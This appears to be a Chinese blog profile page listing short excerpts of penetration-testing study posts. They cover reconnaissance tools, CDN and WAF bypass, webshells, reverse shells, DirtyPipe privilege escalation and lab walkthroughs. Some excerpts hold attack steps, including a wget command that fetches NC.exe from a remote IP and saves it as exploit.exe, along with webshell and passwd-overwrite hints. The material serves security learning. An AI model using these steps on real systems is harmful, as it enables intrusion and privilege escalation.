- 博客(110)
- 收藏
- 关注
原创 第十一天:信息打点-红队工具篇&;Fofa&;Quake&;Kunyu&;Suize水泽&;Arl灯塔
中进行修改,调用api查询功能需要从配置文件修改为自已对应的 api信息。使用需要·配置fofa的api:默认线程数为30实际需要修改可以在。在配置文件iniFile/config.ini里加入api。首先下载并编辑配置文件,添加自己的。这里只有fofa和github的。和个性化设置,并保留原始文件结构。添加fofa的api。
2024-02-18 15:36:34
1460
原创 第十天:信息打点-APP&;小程序篇&;抓包封包&;XP框架&;反编译&;资产提取
1、获取网络信息-服务器厂商:阿里云,腾讯云,机房内部等。网络架构:内外网环境。2、获取服务信息-应用协议-内网资产:FTP,SSH,redis 协议 等。3、获取阻碍信息-CDN服务-WAF防火墙,负载均衡,防火墙阻碍。
2024-01-07 11:00:54
1368
原创 第九天:信息打点-CDN绕过篇&;漏洞回链&;接口探针&;全网扫描&;反向邮件
cdn绕过文章:https://www.cnblogs.com/qiudabai/p/9763739.html。
2023-12-10 23:05:50
637
原创 第八天:信息打点-系统&端口&CDN&负载均衡&防火墙
1、获取网络信息-服务器厂商:阿里云,腾讯云,机房内部等。网络架构:内外网环境。2、获取服务信息-应用协议-内网资产:FTP,SSH,redis 协议 等。3、获取阻碍信息-CDN服务-WAF防火墙,负载均衡,防火墙阻碍。
2023-11-29 21:44:31
827
原创 Webshell流量分析
Webshell看起来和普通的服务端脚本一样,看起来就像普通的代码。Webshell对本地资源具备一定的操作能力,其操作本地资源的范围取决于解析器的权限。?# 利用方式cmd=ls?# 利用方式?# 利用方式# 上传shell.jpg到同一目录,其中包含代码
2023-11-29 16:05:18
674
原创 反弹shell命令速查
Nishang是一个基于PowerShell的攻击框架,整合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。项目地址:https://github.com/besimorhino/powercat。项目地址:https://github.com/samratashok/nishang。
2023-11-29 15:52:44
387
原创 第7天:信息打点-资产泄漏&;CMS识别&;Git监控&;SVN&;DS_Store&;备份
网上开源的程序,得到名字就可以搜索直接获取到源码。
2023-11-19 22:27:14
1149
原创 第6天:信息打点-Web架构篇&;域名&;语言&;中间件&;数据库&;系统&;源码
数据判断: mysql , 通过搭建组合来判断猜测。Z-BlogPHP cms源码名称。Apache 中间件。php 脚本语言。
2023-11-02 15:23:12
334
原创 第5天:基础入门-资产架构&;端口&;应用&;CDN&;WAF&;站库分离&;负载均衡
为了防止某台主机突然死机或者流量过大,会提供几台备用的服务器因此访问的可能是备用的服务器。#一个网站,两套程序,任何一个程序出现问题都可以进行测试,选择不同的目录。例如:钓鱼之后个人电脑被上线获取个人电脑的历史密码等。可以社工猜测得到厂商的账户密码。站点和数据库存放的地址不同,需要进行远程。远程端口连接到平台,猜测账号密码。单个源码的目录指向单个站点域名。针对于网站的防护,应用层防火墙。例如网上之前泄露的密码等。你访问的不一定是真实ip。多地ping,判断。
2023-11-02 14:33:18
487
原创 第4天:基础入门-30余种加密编码进制&;Web&;数据库&;系统&;代码&;参数值
搜狐视频-BASE64解码https://tv.sohu.com/v/MjAyMTEyMzAvbjYwMTE0NTUxMC5zaHRtbA==.html。解密不直接通过算法解密,枚举,将每个加密后进行碰撞测试出每个位数对应的加密字数。3、看当前密文存在的地方(Web,数据库,操作系统等应用)对1123进行加密,生成的密文进行比对,这样来进行解密的。2、看密文的特征(数字,字幕,大小写,符号等)2.掌握常见的加密解密编码解码进制互转的操作。3.了解常见的加密解密编码解密进制互转的影响。
2023-11-01 15:04:26
445
原创 第3天:基础入门-抓包&;封包&;协议&;APP&;小程序&;PC应用&;WEB应用
3.我们可以尝试利用抓取到的数据,首先清空所有的抓包数据,然后在游戏里开启瞬移操作,可以看到数据包的长度发生了变化,此时我选中该数据包,点击发送按钮,即可在游戏里再次瞬移,对于安全测试来说,远程ip端口是我们首要关注的信息。2.启动封包.exe,取消接受包和封包大小限制,选择对应的进程即可抓取到所有的数据。1.打开逍遥安卓模拟器,下载并安装任意游戏,并在设置里关闭WLAN的代理。这里走的是TCP协议,这里获取到了IP就可以进行测试了。注释:这三款软件只能抓取web协议的数据包。数据包十分庞大,要自己过滤。
2023-10-31 15:13:48
2588
5
原创 第二天:基础入门-Web应用&;架构搭建&;漏洞&;HTTP数据包&;代理服务器
这里在国内没有经过备案,域名只能在国外解析。地域中域名没备案选择国外的。根据需求购买适合的服务器。将域名添加到服务器。
2023-10-30 10:58:36
424
原创 第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过
在kali中执行wget http://47.100.167.248:8081/NC.exe -O exploit.exe,就可以下载文件。执行命令的时候,会有数据的回显,告诉自己这个命令是不是执行成功,有没有文件,但是在大部分的测试环境是没有回显的或者是回显是不齐全的。这里自己创建一个直接访问www.xiaodi8.com/nc.exe 就可以直接下载的连接。服务器是一台电脑,可以支持多个应用程序同时运行,可以处理多个同时连接,而电脑不能。用户组是一群用户的统称,给以给这个组配置不同的权限。
2023-10-27 15:25:32
463
原创 linux内网渗透
单次编码后报错,原因是代码中进行了解码,这里需要编码后的再次进行编码后实现二次编码进行绕过。源代码中成加密后的admin密码,这里下载不到源码是网上已经有的。查看www_ddd4_com数据库中doc_user表的内容。用户:www_ddd4_com@localhost。执行该脚本:该脚本默认读取/etc/passwd。这时候已经读取到/etc/passwd了。使用’看到被提示非法字符,进行编码尝试。发现密码被加密信息,解密失败。读取mysql配置信息成功。
2023-09-19 17:33:40
443
原创 Linux DirtyPipe权限提升漏洞 CVE-2022-0847
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”
2023-09-08 09:13:20
382
原创 Connect-The-Dots靶场
从而,在实际进行特权操作时,如果euid不是root,便会检查是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。访问http://192.168.16.161/mysite/bootstrap.min.cs,发现进行了加密。可以http://192.168.16.161/mysite/register.html,打开登录页面。访问刚刚目录扫描结果,在http://192.168.16.161/mysite/查看源代码,看到跳转到了几个文件",在刚刚路径中可以访问。
2023-08-24 10:18:33
457
原创 Me-and-My-Girlfriend靶场
通过模拟 HTTP 请求来访问一个网站的不同用户的 profile 页面,并从 HTML 中提取用户名和密码信息。(XFF)请求标头是一个事实上的用于标识通过代理服务器连接到 web 服务器的客户端的原始 IP 地址的标头。这意味着拥有此权限的用户(在此为 root 用户)可以在不输入密码的情况下执行。冒号分割格式可以用于hrdra爆破密码,保存为一个文件使用hydra尝试。通过插件替换为127.0.01,在刷新访问。得到可以账号:alice,密码:4lic3。可以看到列出了新的用户和隐藏的密码。
2023-08-22 15:54:48
434
原创 Gear_Of_War靶机
查看SOS.txt文件可以看到有个提示和 @%%,有关。在目录中发现文件夹,访问被拒绝,-rbash 受限。可以看到有cp命令,就可以替换passwd文件了。直接解压msg_horda.zip发现需要密码。将/etc/passwd内容复制下来进行替换。可以看到LOCUS_LAN$ 是可以读取的。回到kali使用命令重新连接绕过rbash。只有两个一个root,一个nobody。ssh登录尝试密码不对,应该是别的账号。并使用get将文件下载到本地。这里的自带你需要解压。
2023-08-21 17:54:02
331
原创 HackNos 3靶场
进入控制面板配置网卡第一步:启动靶机时按下 shift 键,第二步:选择第二个选项,然后按下 e 键,进入编辑界面将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入一个相当于控制台的界面,里面可以执行命令ip a 查看一下实际用的网卡,这里是ens33这里和直接的不同20.04的ubuntu已经不用/etc/network/interfaces来设置网络了,变成在/etc/netplan下的文件来配置了注意yaml对缩进和空格要求严格。
2023-08-18 17:51:51
1159
原创 靶场CyNix
提交后发现跳转到了http://192.168.16.159/lavalamp/canyoubypassme.php。下载地址:https://github.com/saghul/lxd-alpine-builder.git。知道普通用户名:ford❌1000:1000:ford,:/home/ford:/bin/bash。在 http://192.168.16.159/lavalamp/ 网站下面有提交框。接着看源代码,在源代码中发现有input提交框,明显是被隐藏显示了。/ect/passwd,拦截。
2023-08-17 14:11:30
179
原创 dom靶场
Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组。漏洞检测脚本进行检测 https://github.com/mzet-/linux-exploit-suggester。https://www.revshells.com/ 网站生成反弹shell网站。这里扫描出两个目录一个/index.php,一个 /admin.php.这里tar命令,可以绕过文件的读权限检查以及目录的读/执行权限的检查。
2023-08-16 14:55:28
405
原创 trollcave靶场
第一步:启动靶机时按下 shift 键,第二步:选择第二个选项,然后按下 e 键,进入编辑界面将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入一个相当于控制台的界面,里面可以执行命令ip a 查看一下实际用的网卡,这里是ens33vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,如果不一致,则将这两个都改成 ens33/etc/init.d/networking restart 重启网卡服务。
2023-08-15 09:09:17
295
原创 hackNos靶机
靶机下载地址flag:2个flag第一个user.txt和第二个root.txt学习内容:exploit(利用)Web Application(Web应用程序 )Enumeration(枚举)Privilege Escalation(权限提升)
2023-08-12 15:15:52
374
原创 netcat反弹shell
在执行命令漏洞,一般的利用漏洞是执行反弹shell在进行其他操作。执行反弹shell的命令有许多。反弹shell因为是受害者,反向连接远程服务器,请求是内部到外部,所以防火墙是不会进行拦截的。
2023-08-11 15:53:29
407
原创 项目4渗透全过程
任务从拓扑图中可以其中一台web服务器可以进行与kali的直接通信。该web服务器是双重网段。也就是拿到该服务器就可以在进行下一步内网操作了。2008配置:护卫神主机系统密码:!@#Qwe123.sqlserver2008密码:!@#a123…
2023-07-22 15:19:19
1052
原创 02-权限提升-Win溢出漏洞及AT&SC&PS提权
明确权限提升基础知识:权限划分明确权限提升环境问题:web及本地明确权限提升方法针对:针对方法适应问题明确权限提升针对版本:个人及服务器版本;针对方法;Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这些用户账户也将具备该组所拥有的权限。
2023-05-04 18:02:36
874
原创 01-权限提升-网站权限后台漏洞第三方获取
本节课内容主要是权限提升的思路,不涉及技术当前知识点在渗透流程中的点当前知识点在权限提升的重点当前知识点权限提升权限介绍利用成功后的思想 需要总结的思路。
2023-05-01 22:08:25
1147
原创 03-WAF绕过-漏洞利用之注入上传跨站等绕过
通过sqlmap对网站进行测试的时候,如果对方有cc流量防护,需要给sqlmap设置一个代理进行注入。修改user-agent头: (1)加参数:–random-agent (2)直接加上头部加参数:–user-agent=“Mozilla/5.0 (compatible;指定一个user-agent的值进行测试。(3)修改配置文件sqlmap.conf中的agent变量值 加代理:–proxy=“http:tps123.kdlapi.com:15818”这里的代理为自己购买的。
2023-05-01 21:38:58
863
原创 04-waf绕过权限控制
echo $str;echo $$str;?说明:1、s t r 的 变 量 的 值 为 字 符 串 v a r 2 、 str的变量的值为字符串 var2、str的变量的值为字符串var2、s t r 为 一 个 可 变 变 量 , str为一个可变变量,str为一个可变变量,str的值为 var 则 $$str 等同于 $var。
2023-04-20 14:57:36
700
原创 02-waf绕过漏洞发现之代理池指纹被动探针
我们举个例子,由于每个工具判断注入点的方式不同,假设awvs通过and 1=1判断注入,xray通过or 1=1判断注入,那么当waf对and 1=1进行拦截时,我们就不能使用awvs来扫描了,因为扫描不出结果,但是我们可以换xray扫描,这样就绕过了waf拦截,所以实际操作时,我们可以多换几个工具进行扫描。awvs扫描,配置代理,将数据包发送到burp,burp配置代理,将数据包发送给xray,实现三者联动。此外还可以使用冷门扫描工具,因为工具冷门,所以漏洞验证和指纹都不会被WAF采集到,可以绕过。
2023-04-19 13:55:35
739
原创 01-WAF绕过信息收集
CC攻击可以归为DDoS攻击的一种,其原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC攻击主要模拟多个用户不停地进行访问那些需要大量数据操作的页面,造成服务器资源的浪费,使CPU长时间处于100%,永远都有处理不完的连接直至网络拥塞,令正常的访问被中止。同时,CC攻击的IP都是真实、分散的,并且都是正常的数据包,全都是有效且无法拒绝的请求。另外,因为CC攻击的目标是网页,所以服务器什么的都可以连接,ping也没问题,但是网页就是无法访问。
2023-04-17 11:39:38
917
原创 03-漏洞发现API接口服务等
思路1:假设xx.com对应目录d:/wwwroot/xx/,192.168.33.2对应目录d:/wwwroot/,此时目录d:/wwwroot/下有一个网站备份压缩包xx.zip,那么访问xx.com/xx.zip不能下载,但是访问192.168.33.2/xx.zip可以成功下载。思路2:给定一个域名,我们先找到对应的ip,然后扫描IP,可以发现开放的端口,我们进行目录扫描或敏感文件扫描时,不仅需要对域名扫描,还要对IP以及IP:端口进行扫描,这样会发现更多的漏洞。ip绑定的其他域名等。
2023-04-14 15:51:28
1396
原创 02-app漏洞发现
apk反编译提取URL或抓包获取url,进行web应用测试,如不存在或走其他协议的情况下,需采用网络接口抓包进行数据获取,转至其他协议安全测试!apk测试主要分为三个方向:apk->WEB;apk->其他;apk->逆向。
2023-04-13 11:10:40
721
原创 1漏洞发现
Nessus是全球使用人数最多的系统漏洞扫描与分析软件,这是一个免费、威力强大、更新频繁并简易使用的远端系统安全扫描程序,功能十分强大。
2023-04-11 00:07:04
1456
原创 24-xxe漏洞学习
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。实体引用是对实体的引用。实体可在内部或外部进行声明。(1)内部实体声明ENTITY 实体名称 "实体的值">(2)外部实体声明ENTITY 实体名称 SYSTEM "URI">(3)参数实体声明ENTITY %实体名称 "实体的值">ENTITY %实体名称 SYSTEM "URI">通过在xml使用“&”符号对实体进行引用ENEMENT name ANY> //定义元素ANY表示接受任何元素。
2023-04-10 00:16:35
1608
网络安全学习linux部分命令
2022-11-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人